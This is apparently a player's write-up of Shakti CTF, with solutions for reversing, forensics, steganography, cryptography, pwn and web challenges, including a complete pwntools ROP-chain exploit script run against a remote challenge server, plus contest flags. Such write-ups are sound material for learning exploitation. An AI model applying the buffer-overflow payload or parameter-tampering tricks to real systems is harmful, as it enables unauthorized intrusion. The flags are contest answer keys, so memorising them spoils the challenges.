Reversing
Just-Run-It!
Do you know how to run a binary in linux?
Just run it.
~/ctf/Shakti CTF ᐅ ./run
Here's your flag! : shaktictf{and_that's_how_you_run_a_linux_binary!}
FLAG : shaktictf{and_that's_how_you_run_a_linux_binary!}
PYthn
Familiar with python?
Z=[]
k=[]
Q="K78m)hm=|cwsXhbH}uq5w4sJbPrw6"

def Fun(inp):
    st=[]
    for i in range (len(inp)):
        st.append(chr(ord(inp[i])^1))
    return(''.join(st))

def FuN(inp):
    for i in range(len(inp)):
        if(i<11):
            Z.append(chr(ord(inp[i])+i+5))
        else:
            Z.append(chr(ord(inp[i])+4))
    return(''.join(Z))

def fuN(text,s):
    result = ""
    for i in range(len(text)):
        char = text[i]
        if(char.isnumeric()):
            result+=(chr(ord(char)-1))
        elif(char.isupper()):
            result += chr((ord(char) + s-65) % 26 + 65)
        else:
            result+=(chr(ord(char)^1))
    return result

X=input("Enter input:")
k=FuN(Fun(X))
if(Q!=k):
    print("NO")
else:
    print("Flag: shaktictf{"+X+"}")
solve.py
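Z=[]
Q="K78m)hm=|cwsXhbH}uq5w4sJbPrw6"

# XOR with 1 is its own inverse, so Fun is unchanged from the challenge
def Fun(inp):
    st=[]
    for i in range (len(inp)):
        st.append(chr(ord(inp[i])^1))
    return(''.join(st))

# Inverse of the challenge's FuN: subtract the offsets instead of adding them
def FuN(inp):
    for i in range(len(inp)):
        if(i<11):
            Z.append(chr(ord(inp[i])-i-5))
        else:
            Z.append(chr(ord(inp[i])-4))
    return(''.join(Z))

# The challenge computes FuN(Fun(X)), so undo FuN first, then Fun
print(Fun(FuN(Q)))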
~/ctf/Shakti CTF/PYthn ᐅ python3 solve.py
G00d!_c0nTinUe_Expl0r1nG_Mor3
FLAG : shaktictf{G00d!_c0nTinUe_Expl0r1nG_Mor3}
Damez
Oops! There was a sudden crash on Margret's system. She's afraid that she lost the passcode which she needs in urgency for running a simple prog which hopefully was backed up. Could you figure out the passcode and run the program successfully.
I looked at it in IDA and the flag was there.
FLAG : shaktictf{K33p_th3_gam3_g0ing_gurl!}
Forensics
Shark on Wire
Lara sent me a file which had some hidden message. Help me recover the secret information.
Look at it in Wireshark.
FLAG : shaktictf{wir3sh4rk_i5_ju5t_aw3s0m3}
Not That Easy
We have intercepted the communication between two criminals and we found that they had shared a secret information. Can you find out the secret?
There is a PNG. Save it as raw.
FLAG : shaktictf{sh3_w4s_h0n0r3d_by_3lectr0nic_fr0nti3r_f0und4ti0n}
Steganography
Hidd3n
##############################
########## exiftool ##########
##############################
ExifTool Version Number : 10.40
File Name : image.jpg
Directory : .
File Size : 44 kB
File Modification Date/Time : 2020:12:04 18:21:00+00:00
File Access Date/Time : 2020:12:05 05:05:46+00:00
File Inode Change Date/Time : 2020:12:05 05:05:42+00:00
File Permissions : rw-------
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : cGFzc3BocmFzZT1qdTV0ZmluZG0z
Image Width : 800
Image Height : 600
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 800x600
Megapixels : 0.480
$ echo cGFzc3BocmFzZT1qdTV0ZmluZG0z | base64 -d
passphrase=ju5tfindm3
root@3a8a801b9951:/data# steghide extract -sf image.jpg
Enter passphrase: ju5tfindm3
wrote extracted data to "flag.txt".
"In engineering, the point is to get the job done, and people are happy to help. You should be generous with credit, and you should be happy to help others." Who am I? Here is your flag: shaktictf{G00d!_b3st_0f_luck_f0r_th3_n3xt_chall3nge}
FLAG : shaktictf{G00d!_b3st_0f_luck_f0r_th3_n3xt_chall3nge}
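The Comment field that exiftool printed lives in a JPEG COM (0xFFFE) segment. As an added example (not part of the original writeup), the following walks the marker segments of a JPEG, collects COM payloads and tries to base64-decode them. The function names and the minimal JPEG built in build_sample are constructed for illustration; only the comment string is the one shown above.

```python
import base64
import binascii
import struct

def jpeg_comments(data: bytes):
    """Walk JPEG marker segments and return the payload of every COM segment."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    comments, pos = [], 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI or start of scan: metadata is over
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        # The 2-byte length field counts itself but not the marker bytes.
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("truncated or corrupt segment")
        if marker == 0xFE:
            comments.append(data[pos + 4:pos + 2 + length])
        pos += 2 + length
    return comments

def try_base64(blob: bytes):
    """Return the decoded text if blob is strict base64 of printable ASCII."""
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None
    return text if text and text.isprintable() else None

def build_sample() -> bytes:
    """Constructed header-only JPEG: SOI, JFIF APP0, one COM segment, EOI."""
    comment = b"cGFzc3BocmFzZT1qdTV0ZmluZG0z"  # Comment value from the exiftool output
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    segs = b"\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
    segs += b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + segs + b"\xff\xd9"

if __name__ == "__main__":
    for c in jpeg_comments(build_sample()):
        print(c, "->", try_base64(c))
```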
Cryptography
3,2,1..Go
Introducing our theme woman : "Joan Clarke!" Cipher : WEQEXFTUXQHVOUFPSVLPTORHAFBQE Looks like I found something I shouldn't have. Separate the words by underscores('_ ') and submit everything in lowercase around the flag format
Decrypt the Enigma cipher using the config as a reference.
FLAG : shaktictf{you_have_cracked_the_enigma_genius}
Easy Encoding
Joan knows this is breakable. Do you know how? 01001110 01111010 01001101 00110010 01001111 01000100 01011001 01111000 01001110 01101101 01001001 00110011 01001110 01000100 01011001 00110101 01001110 01101010 01001101 00110011 01001110 01000100 01011001 00110010 01001110 00110010 01001001 00110001 01001110 01111010 01001101 00110000 01001110 01111010 01001001 00110010 01011010 01000100 01010101 00110001 01001110 01111010 01000001 00110001 01011010 01101010 01010001 01111010 01001110 01101010 01100111 01111010 01001110 01000100 01011010 01101010 01001110 01101101 01001101 01111010 01001101 01111010 01011010 01101100 01001110 01101010 01100011 01111010 01001101 01111010 01100100 01101011
Decode in this order: from binary, then base64, then hex.
FLAG : shaktictf{W4rmUp_Ch4ll3ng3}
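The same binary, base64, hex chain can be peeled automatically by testing the most restrictive alphabet first. This is an added example, not part of the original writeup; it generalizes to any ordering of the three layers, and the function names and the sample built by build_sample are constructed for illustration.

```python
import base64
import binascii
import re

def peel_once(data: str):
    """Return (layer_name, decoded_text), or None when no layer matches."""
    compact = "".join(data.split())
    # A bit string is also valid hex and valid base64, and a hex string is
    # also valid base64, so check the narrowest alphabet first.
    if re.fullmatch(r"[01]+", compact) and len(compact) % 8 == 0:
        name = "binary"
        raw = bytes(int(compact[i:i + 8], 2) for i in range(0, len(compact), 8))
    elif re.fullmatch(r"[0-9a-fA-F]+", compact) and len(compact) % 2 == 0:
        name, raw = "hex", bytes.fromhex(compact)
    else:
        try:
            name, raw = "base64", base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    # Stop when the result is empty or not printable: that was not a text layer.
    if not text or not text.isprintable():
        return None
    return name, text

def peel(data: str, max_layers: int = 10):
    """Peel layers until nothing matches; return (layer_names, final_text)."""
    layers = []
    for _ in range(max_layers):
        step = peel_once(data)
        if step is None:
            break
        layers.append(step[0])
        data = step[1]
    return layers, data

def build_sample(text: str) -> str:
    """Constructed input: text -> hex -> base64 -> space-separated bits."""
    b64 = base64.b64encode(text.encode().hex().encode()).decode()
    return " ".join(f"{ord(ch):08b}" for ch in b64)

if __name__ == "__main__":
    print(peel(build_sample("constructed{not_a_real_flag}")))
```

A short plaintext that happens to be valid base64 would be peeled one layer too far, so check the reported layer list against the final output.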
Ancient Warfare
rot13
Do you know how people from Caesar's time used to send encrypted messages? Try to get the flag : funxgvpgs{byq3e_1f_a0g_nyj4lf_gu3_o3gg3e!}
FLAG : shaktictf{old3r_1s_n0t_alw4ys_th3_b3tt3r!}
SimpleRSA
Here's the secret message from Joan to you. Break it and Read it.
Here's a simple RSA challenge for you.
n = 6823097956559906304718047559434503772935670794168872682087986860491266565197938988585578012131795379682740793915178580560097648572207445450501957620442660379247761L
e = 65537
c = 484661494807973176484841550022162356056969394230726278907827156279573785417739620605749085238379352332325669223692676583758711843467179784519220209212809010990483
~/tools/RsaCtfTool (master ✘)✭ ᐅ python3 RsaCtfTool.py -n 6823097956559906304718047559434503772935670794168872682087986860491266565197938988585578012131795379682740793915178580560097648572207445450501957620442660379247761 -e 65537 --uncipher 484661494807973176484841550022162356056969394230726278907827156279573785417739620605749085238379352332325669223692676583758711843467179784519220209212809010990483
[+] Clear text : b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00shaktictf{Gr3a7-g01ng-g1rl-Y4yyy!!}'
FLAG : shaktictf{Gr3a7-g01ng-g1rl-Y4yyy!!}
Pwn
Connect
Your adventure begins here to help the renowned Computer Scientist Kathleen Booth to get across the challenges and win the race. Cross the gates and enter into the arena!
Just connect.
~/ctf/Shakti CTF ᐅ nc 34.72.218.129 1111
You have successfully connected to our service!
To get your flag, please enter the appropriate bash commands.
cat flag.txt
shaktictf{w3lc0me_t0_th3_ar3na_c0mrade}
FLAG : shaktictf{w3lc0me_t0_th3_ar3na_c0mrade}
Adventure Chain
Kathleen is on her next adventure, which marked her name in history of Computer Science forever. Looks like the pieces of her ARC code seem to be brewing something notorious. Follow the chains which might lead you to a hideous place where you can claim your mastery and discover the unintended invention.
gdb-peda$ patto AA0AAFAAbA
AA0AAFAAbA found at offset: 40
The offset to rip is 40.
The flag function requires the condition if ( password == 0x1337 && admin_val == 0xCAFEBABE && a1 == 0xDEADC0DE && a2 == 0xDEAD10CC ) to be satisfied. The assert function sets password.
__int64 __noreturn assert()
{
  password = 0x1337;
  return 0LL;
}
The setValue function can set admin_val. Use pop rdi; ret; to pass 0xDEADBEEF as the first argument.
__int64 __fastcall setValue(int a1)
{
  if ( password != 0x1337 || a1 != 0xDEADBEEF )
    puts("Oops no :(");
  else
    admin_val = 0xCAFEBABE;
  return 0LL;
}
After that, build the ROP chain so that the flag function is called with 0xDEADC0DE as the first argument and 0xDEAD10CC as the second argument.
from pwn import *

binary = "./chall"
host ="34.72.218.129"
port = 4444

elf = ELF(binary)
context.binary = binary
context.log_level = "info"

commands = """
continue
"""

if len(sys.argv) >= 2 and sys.argv[1] == "r":
    # remote
    s = remote(host, port)
elif len(sys.argv) >= 2 and sys.argv[1] == "d":
    # debug
    s = gdb.debug(binary, commands)
    # libc = elf.libc
else:
    # local
    s = process(binary)
    # libc = elf.libc

pop_rdi = next(elf.search(asm("pop rdi; ret")))
pop_rsi_r15 = next(elf.search(asm("pop rsi ; pop r15 ; ret")))

s.sendlineafter(">> ", "1")

# 40 bytes of padding reach the saved rip
payload = b"A"*40
# assert() sets password = 0x1337
payload += p64(elf.sym["assert"])
# setValue(0xDEADBEEF) sets admin_val = 0xCAFEBABE
payload += p64(pop_rdi)
payload += p64(0xDEADBEEF)
payload += p64(elf.sym["setValue"])
# flag(0xDEADC0DE, 0xDEAD10CC); the extra 0 fills r15
payload += p64(pop_rdi)
payload += p64(0xDEADC0DE)
payload += p64(pop_rsi_r15)
payload += p64(0xDEAD10CC)
payload += p64(0)
payload += p64(elf.sym["flag"])

s.sendlineafter("Enter your name:\n", payload)
sleep(1)
s.interactive()
~/ctf/Shakti CTF/Adventure Chain ᐅ python3 exploit.py r
[*] '/home/user/ctf/Shakti CTF/Adventure Chain/chall'
    Arch: amd64-64-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE (0x400000)
[+] Opening connection to 34.72.218.129 on port 4444: Done
[*] Switching to interactive mode
Mischief managed...
Here is your flag: shaktictf{r0pe_climbing_chaining_1337_way}
[*] Got EOF while reading in interactiv
FLAG : shaktictf{r0pe_climbing_chaining_1337_way}
Web
Biscuits
Ada Lovelace used to love eating french biscuits during her work
The flag is in the cookie.
URL-decode it.
FLAG : shaktictf{c00k13s_m4k3_phr3n0l0gy&m3sm3r15m_3asy}
Machine
Babbage was impressed by Lovelace's intellect and analytic skills that he called her a humanoid
Look at robots.txt.
~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://34.72.245.53/Web/Machine/robots.txt
User-agent: *
Allow: /var/www/html/
Disallow: /mkiujnbhytgbvfr.html
~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://34.72.245.53/Web/Machine/mkiujnbhytgbvfr.html
shaktictf{7h3_3nch4n7r355_0f_Nu3b3r}
FLAG : shaktictf{7h3_3nch4n7r355_0f_Nu3b3r}
Ador
Ada was born on 10 December 1815 not 12, identification change makes a difference
Apparently the secret is visible if you are admin.
Checking the source, there seems to be a user parameter.
~/ctf/Shakti CTF/Adventure Chain ᐅ curl http://104.198.67.251/Ador/\?name\=admin
Welcome Admin, here is the secret shaktictf{f1r5t_c0mpu73r_pr0gr4mm3r}
FLAG : shaktictf{f1r5t_c0mpu73r_pr0gr4mm3r}
AuthEN
Ada is important to the world, she is important for a reason
The password is in the source.
<script>
$(".c_submit").click(function(event) {
    event.preventDefault()
    var email = $("#cuser").val();
    var password = $("#cpass").val();
    if(username == "admin" && password == String.fromCharCode(115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125)) {
        if(document.location.href.indexOf("?password=") == -1) {
            document.location = document.location.href + "?password=" + password;
        }
    } else {
        $("#cresponse").html("<div class='alert alert-danger'>Wrong password sorry.</div>");
    }
})
</script>
s = [115, 104, 97, 107, 116, 105, 99, 116, 102, 123, 98, 51, 121, 48, 110, 100, 95, 112, 117, 114, 51, 95, 99, 52, 108, 99, 117, 108, 97, 116, 105, 48, 110, 115, 125]
flag = ""
for c in s:
    flag += chr(c)
print(flag)
~/ctf/Shakti CTF ᐅ python3 solve.py
shaktictf{b3y0nd_pur3_c4lculati0ns}
FLAG : shaktictf{b3y0nd_pur3_c4lculati0ns}